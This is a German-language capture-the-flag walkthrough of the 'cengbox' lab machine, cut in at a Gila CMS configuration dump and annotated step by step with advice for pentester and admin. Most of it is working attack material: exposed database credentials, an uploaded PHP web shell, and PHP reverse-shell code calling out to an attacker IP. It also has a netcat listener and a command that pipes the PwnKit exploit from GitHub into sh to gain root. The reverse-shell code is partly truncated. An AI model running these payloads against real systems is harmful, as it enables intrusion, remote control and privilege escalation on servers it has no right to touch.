'base' => 'http://admin.ceng-company.vm/gila/',
'theme' => 'gila-blog',
'title' => 'Gila CMS',
'slogan' => 'An awesome website!',
'default-controller' => 'blog',
'timezone' => 'America/Mexico_City',
'ssl' => '',
'env' => 'pro',
'check4updates' => 1,
'language' => 'en',
'admin_email' => 'kevin@ceng-company.vm',
'rewrite' => true,
);

Technische Analyse: Zugriff auf die Konfigurationsdatei `config.php` über den Dateimanager.

Kontextbezogene Bewertung: Die Konfigurationsdatei enthält sensible Informationen,darunter die Datenbankanmeldeinformationen (Benutzername: root, Passwort: SuperS3cR3TPassw0rd1!). Dies ist ein schwerwiegendes Sicherheitsrisiko.

Handlungsorientierte Empfehlungen: Für den Pentester: Verwenden Sie die Datenbankanmeldeinformationen, um auf die Datenbank zuzugreifen und weitere Informationen zu sammeln. Für den Systemadministrator: Ändern Sie das Datenbankpasswort sofort. Beschränken Sie den Zugriff auf die Konfigurationsdatei.

┌──(root㉿CCat)-[~]
└─# http://admin.ceng-company.vm/gila/admin/fm?f=./config.php
- Upload: - shell2.php - File uploaded successfully

Technische Analyse: Hochladen einer PHP-Shell-Datei (shell2.php) über den Dateimanager.

Kontextbezogene Bewertung: Das Hochladen einer PHP-Shell ermöglicht die Ausführung beliebiger Befehle auf dem Server. Dies ist ein schwerwiegendes Sicherheitsrisiko.

Handlungsorientierte Empfehlungen: Für den Pentester: Verwenden Sie die PHP-Shell, um Befehle auszuführen und auf das System zuzugreifen. Für den Systemadministrator: Deaktivieren Sie die Dateiupload-Funktion oder beschränken Sie die Dateitypen, die hochgeladen werden können. Überwachen Sie das Dateisystem auf verdächtige Dateien.

┌──(root㉿CCat)-[~]
└─# admin.ceng-company.vm/gila/admin/fm?f=./shell2.php
system($ GET["cmd"]);

Technische Analyse: Zugriff auf die hochgeladene PHP-Shell (shell2.php).

Kontextbezogene Bewertung: Die PHP-Shell ermöglicht die Ausführung von Befehlen über die GET-Variable `cmd`.

Handlungsorientierte Empfehlungen: Für den Pentester: Verwenden Sie die PHP-Shell, um Befehle auszuführen und auf das System zuzugreifen. Für den Systemadministrator: Entfernen Sie die PHP-Shell sofort. Überprüfen Sie die Protokolle auf verdächtige Aktivitäten.

┌──(root㉿CCat)-[~]
└─# http://admin.ceng-company.vm/gila/admin/fm?f=./index.php
set_time_limit (0);
$VERSIN = "1.0";
$ip = '192.168.2.199'; // CHANGE THIS
$port = 9001; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

}
else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//
// pen reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}

// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
printit("ERRR: Can't spawn shell");
exit(1);
}

// Set everything to non-blocking
// Reason: ccsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}

Technische Analyse: Zugriff auf eine Datei namens `index.php` über den Dateimanager. Diese Datei enthält PHP-Code, der eine Reverse-Shell-Verbindung initiiert.

Kontextbezogene Bewertung: Die Datei enthält Code für eine Reverse-Shell, die eine Verbindung zu einer angegebenen IP-Adresse (192.168.2.199) auf Port 9001 herstellt. Dies ermöglicht dem Angreifer, eine Shell-Sitzung auf dem Zielsystem zu erhalten.

Handlungsorientierte Empfehlungen: Für den Pentester: Nutzen Sie diese Datei, um eine Reverse-Shell-Verbindung herzustellen. Für den Systemadministrator: Identifizieren und entfernen Sie diese Datei sofort. Überprüfen Sie das System auf andere verdächtige Dateien.

┌──(root㉿CCat)-[~]
└─# revshell
---

Technische Analyse: Dieser Kommentar deutet darauf hin, dass ein Schritt zur Initialisierung der Reverse Shell folgt.

Kontextbezogene Bewertung: Bereitet die Umgebung vor, um die Reverse Shell zu aktivieren.

Handlungsorientierte Empfehlungen: Für den Pentester: Stellen Sie sicher, dass der Listener (z. B. `nc -lvnp 9001`) auf dem eigenen System aktiv ist, bevor Sie fortfahren. Für den Systemadministrator: Überwachen Sie ausgehende Verbindungen, um Reverse-Shell-Versuche zu erkennen.

┌──(root㉿CCat)-[~]
└─# curl http://admin.ceng-company.vm/gila/index.php
---

Technische Analyse: Ausführen von `curl`, um die Datei `index.php` auf dem Zielserver abzurufen. Dies triggert die Ausführung des PHP-Codes in der Datei, der die Reverse Shell initiiert.

Kontextbezogene Bewertung: Durch den Aufruf der URL wird die Reverse-Shell-Verbindung ausgelöst.

Handlungsorientierte Empfehlungen: Für den Pentester: Stellen Sie sicher, dass der `curl`-Befehl erfolgreich ausgeführt wird und die Reverse-Shell-Verbindung aufgebaut wird. Für den Systemadministrator: Überwachen Sie Webserver-Protokolle auf verdächtige `curl`-Anfragen.

Initial Access

┌──(root㉿CCat)-[~]
└─# nc -lvnp 9001
listening on [any] 9001 ...
connect to [192.168.2.199] from (UNKNWN) [192.168.2.145] 54204
Linux cengbox 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
15:34:39 up 1 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FRM LGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

Technische Analyse: `nc -lvnp 9001` startet Netcat im Listening-Modus auf Port 9001. Nach dem Ausführen von `curl` stellt das Zielsystem eine Verbindung her.

Kontextbezogene Bewertung: Eine Reverse-Shell-Verbindung wurde erfolgreich hergestellt. Die Ausgabe zeigt, dass die Verbindung von der IP-Adresse des Zielsystems (192.168.2.145) kommt und der Benutzer `www-data` ist.

Handlungsorientierte Empfehlungen: Für den Pentester: Führen Sie Befehle aus, um das System zu erkunden und nach Möglichkeiten zur Privilege Escalation zu suchen. Für den Systemadministrator: Erkennen und unterbrechen Sie Reverse-Shell-Verbindungen sofort. Untersuchen Sie die Ursache der Kompromittierung.

┌──(root㉿CCat)-[~]
└─# www-data@cengbox:/$ stty rows 48 columns 94
---

Technische Analyse: Der Befehl `stty rows 48 columns 94` passt die Größe des Terminals an.

Kontextbezogene Bewertung: Dieser Befehl verbessert die Benutzerfreundlichkeit der Shell.

Handlungsorientierte Empfehlungen: Für den Pentester: Dies ist ein optionaler Schritt, um die Terminalausgabe zu verbessern. Für den Systemadministrator: Keine spezifische Empfehlung.

┌──(root㉿CCat)-[~]
└─# www-data@cengbox:/$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Technische Analyse: Der Befehl `id` zeigt die Benutzer-ID (uid), Gruppen-ID (gid) und Gruppen des aktuellen Benutzers an.

Kontextbezogene Bewertung: Die Ausgabe bestätigt, dass die Shell als Benutzer `www-data` ausgeführt wird.

Handlungsorientierte Empfehlungen: Für den Pentester: Der nächste Schritt ist die Privilege Escalation, da der Benutzer `www-data` nur eingeschränkte Berechtigungen hat. Für den Systemadministrator: Beschränken Sie die Berechtigungen des Benutzers `www-data` so weit wie möglich.

Privilege Escalation

┌──(root㉿CCat)-[~]
└─# www-data@cengbox:/$ find / -type f -perm -4000 -ls 2>/dev/null
390254 28 -rwsr-xr-x 1 root root 27608 May 16 2018 /bin/umount
390220 44 -rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6
401972 32 -rwsr-xr-x 1 root root 30800 Jul 12 2016 /bin/fusermount
390205 40 -rwsr-xr-x 1 root root 40152 May 16 2018 /bin/mount
401745 140 -rwsr-xr-x 1 root root 142032 Jan 28 2017 /bin/ntfs-3g
390219 44 -rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping
390236 40 -rwsr-xr-x 1 root root 40128 May 16 2017 /bin/su
292 40 -rwsr-xr-x 1 root root 39904 May 16 2017 /usr/bin/newgrp
14325 52 -rwsr-sr-x 1 daemon daemon 51464 Jan 14 2016 /usr/bin/at
14573 24 -rwsr-xr-x 1 root root 23376 Jan 15 2019 /usr/bin/pkexec
13277 36 -rwsr-xr-x 1 root root 32944 May 16 2017 /usr/bin/newgidmap
387 136 -rwsr-xr-x 1 root root 136808 Jul 4 2017 /usr/bin/sudo
13276 36 -rwsr-xr-x 1 root root 32944 May 16 2017 /usr/bin/newuidmap
303 56 -rwsr-xr-x 1 root root 54256 May 16 2017 /usr/bin/passwd
165 40 -rwsr-xr-x 1 root root 40432 May 16 2017 /usr/bin/chsh
226 76 -rwsr-xr-x 1 root root 75304 May 16 2017 /usr/bin/gpasswd
163 52 -rwsr-xr-x 1 root root 49584 May 16 2017 /usr/bin/chfn
489 12 -rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
11417 44 -rwsr-xr-- 1 root messagebus 42992 Jan 12 2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
150674 100 -rwsr-sr-x 1 root root 98440 Jan 29 2019 /usr/lib/snapd/snap-confine
150622 16 -rwsr-xr-x 1 root root 14864 Jan 15 2019 /usr/lib/policykit-1/polkit-agent-helper-1
14047 420 -rwsr-xr-x 1 root root 428240 Jan 31 2019 /usr/lib/openssh/ssh-keysign
13213 40 -rwsr-xr-x 1 root root 38984 Jun 14 2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic

Technische Analyse: Der Befehl `find / -type f -perm -4000 -ls 2>/dev/null` sucht nach Dateien mit dem SUID-Bit (Set User ID) gesetzt. Dies bedeutet, dass die Dateien mit den Berechtigungen des Eigentümers ausgeführt werden, unabhängig davon, welcher Benutzer sie ausführt.

Kontextbezogene Bewertung: Dateien mit dem SUID-Bit können potenzielle Angriffsvektoren für die Privilege Escalation sein. Der Befehl listet alle gefundenen SUID-Dateien auf.

Handlungsorientierte Empfehlungen: Für den Pentester: Untersuchen Sie die gefundenen SUID-Dateien genauer, um mögliche Schwachstellen zu identifizieren. Für den Systemadministrator: Überprüfen Sie regelmäßig die Liste der SUID-Dateien und stellen Sie sicher, dass sie notwendig und sicher konfiguriert sind.

┌──(root㉿CCat)-[~]
└─# www-data@cengbox:/$ cd /tmp/
---

Technische Analyse: Wechseln in das `/tmp/`-Verzeichnis.

Kontextbezogene Bewertung: Das `/tmp/`-Verzeichnis ist ein häufig verwendeter Ort für Exploits und temporäre Dateien.

Handlungsorientierte Empfehlungen: Für den Pentester: Bereiten Sie Exploits im `/tmp/`-Verzeichnis vor. Für den Systemadministrator: Überwachen Sie das `/tmp/`-Verzeichnis auf verdächtige Dateien.

┌──(root㉿CCat)-[~]
└─# www-data@cengbox:/tmp$ sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"
---

Technische Analyse: Herunterladen und Ausführen des PwnKit-Exploits.

Kontextbezogene Bewertung: PwnKit ist ein Exploit, der eine Privilege Escalation ermöglicht.

Handlungsorientierte Empfehlungen: Für den Pentester: Dies sollte zu Root-Rechten führen. Für den Systemadministrator: Verhindern Sie das Herunterladen und Ausführen von Exploits.

Proof of Concept: Erfolgreiche Root-Privilegienerlangung durch PwnKit

Zusammenfassung: Dieser Proof of Concept demonstriert die erfolgreiche Ausnutzung der PwnKit-Schwachstelle, um Root-Privilegien auf dem Zielsystem zu erlangen.

┌──(root㉿CCat)-[~]
└─# root@cengbox:/tmp# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

Technische Analyse: Der Befehl `id` wird erneut ausgeführt, um die aktuellen Benutzerinformationen anzuzeigen.

Kontextbezogene Bewertung: Die Ausgabe zeigt, dass der Benutzer jetzt Root-Rechte hat (uid=0, gid=0). Fantastisch, der Root-Zugriff war erfolgreich! Nun haben wir unser Ziel erreicht.

Handlungsorientierte Empfehlungen: Für den Pentester: Fahren Sie mit der Ausführung von Befehlen als Root fort. Für den Systemadministrator: Patchen Sie die PwnKit-Schwachstelle sofort.

┌──(root㉿CCat)-[~]
└─# root@cengbox:/tmp# cd ~
---

Technische Analyse: Wechseln in das Root-Verzeichnis.

Kontextbezogene Bewertung: Bereitet die Umgebung vor, um die Root-Rechte zu nutzen.

Handlungsorientierte Empfehlungen: Für den Pentester: Navigieren Sie im Root-Verzeichnis, um Root-spezifische Informationen zu finden. Für den Systemadministrator: Keine spezifische Empfehlung.

┌──(root㉿CCat)-[~]
└─# root@cengbox: ls
root.txt

Technische Analyse: Anzeigen des Inhalts des Root-Verzeichnisses.

Kontextbezogene Bewertung: Die Datei `root.txt` ist vorhanden.

Handlungsorientierte Empfehlungen: Für den Pentester: Lesen Sie den Inhalt der Datei `root.txt`. Für den Systemadministrator: Keine spezifische Empfehlung.

┌──(root㉿CCat)-[~]
└─# root@cengbox: cat root.txt
_____ ______ _____ / ____| ______ | _ \ | __ \ | | | | _ _ __ _ __ _| |_) | _____ __ ) | | | | | __| | '_ \ / _` | | _ < / _ \ \/ / / / | |____| |____| | | | (_| | |_) | (_) > < / /_ \_____| ______|_| |_|\__, | ____/ \ ___/_/\_\ ____| __/ | |___/ I would be grateful for your any feedback. Feel free to contact me on Twitter @arslanblcn_ de89782fe4e8bf2198a022ae7f50613e

Technische Analyse: Anzeigen des Inhalts der Datei `root.txt`.

Kontextbezogene Bewertung: Die Datei enthält eine Nachricht und die Root-Flagge (de89782fe4e8bf2198a022ae7f50613e).

Handlungsorientierte Empfehlungen: Für den Pentester: Notieren Sie sich die Root-Flagge. Für den Systemadministrator: Keine spezifische Empfehlung.

┌──(root㉿CCat)-[~]
└─# root@cengbox: ls /home/
mitnick swartz

Technische Analyse: Anzeigen des Inhalts des `/home/`-Verzeichnisses.

Kontextbezogene Bewertung: Das `/home/`-Verzeichnis enthält die Benutzerverzeichnisse `mitnick` und `swartz`.

Handlungsorientierte Empfehlungen: Für den Pentester: Untersuchen Sie die Benutzerverzeichnisse auf sensible Informationen. Für den Systemadministrator: Überwachen Sie die Benutzerverzeichnisse auf verdächtige Aktivitäten.

┌──(root㉿CCat)-[~]
└─# root@cengbox: ls /home/mitnick/user.txt
/home/mitnick/user.txt

Technische Analyse: Überprüfen, ob die Datei `/home/mitnick/user.txt` existiert.

Kontextbezogene Bewertung: Die Datei `user.txt` existiert.

Handlungsorientierte Empfehlungen: Für den Pentester: Lesen Sie den Inhalt der Datei `user.txt`. Für den Systemadministrator: Keine spezifische Empfehlung.

┌──(root㉿CCat)-[~]
└─# root@cengbox: cat /home/mitnick/user.txt
a10333b0b7c3f914e8c446fd8e9cd362

Technische Analyse: Anzeigen des Inhalts der Datei `/home/mitnick/user.txt`.

Kontextbezogene Bewertung: Die Datei enthält die User-Flagge (a10333b0b7c3f914e8c446fd8e9cd362).

Handlungsorientierte Empfehlungen: Für den Pentester: Notieren Sie sich die User-Flagge. Für den Systemadministrator: Keine spezifische Empfehlung.

Flags

┌──(root㉿CCat)-[~]
└─# cat /home/mitnick/user.txt
a10333b0b7c3f914e8c446fd8e9cd362
┌──(root㉿CCat)-[~]
└─# cat root.txt
de89782fe4e8bf2198a022ae7f50613e